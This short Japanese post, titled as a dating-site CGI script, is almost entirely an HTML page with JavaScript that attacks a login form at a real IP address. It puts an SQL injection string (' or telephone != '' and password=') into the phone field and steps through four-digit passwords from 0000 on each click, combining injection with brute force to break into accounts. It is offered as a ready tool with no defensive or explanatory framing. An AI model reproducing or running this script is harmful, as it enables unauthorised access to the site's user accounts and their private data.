出会い系サイトのcgiスクリプト

このエントリーをはてなブックマークに追加
5642
<head>
<script>
str = "' or telephone != '' and password='";
function ttt(){
intNum = parseInt(document.ccc.con.value) + 1;
document.ccc.con.value = intNum;
strNum = intNum.toString(10);
while (strNum.length < 4){
strNum = "0" + strNum;
}
document.ff.tel.value = str + strNum;
document.ff.pass.value = strNum;
document.ff.submit();
}
</script>
</head>
<body>
<form action="http://210.157.14.41/m/index.php" method="get" target=betru" name="ff">
<input type=hidden name="a" value="menu">
<input type=hidden name="log" value="1">
<input type=hidden name="mid" value="">
<input name="tel" value="' or telephone != '' and password='" size=100 istyle="4"><br>
<input name="pass" value="0000" size=10 maxlength=4 istyle="4" MODE=numeric><br>
<input type=submit value="ログイン"><br>
</form><form name=ccc>
<input name=con type=text value="0" size=6>
<input type=button value="++Submit" onClick="ttt();">
</form></body></html>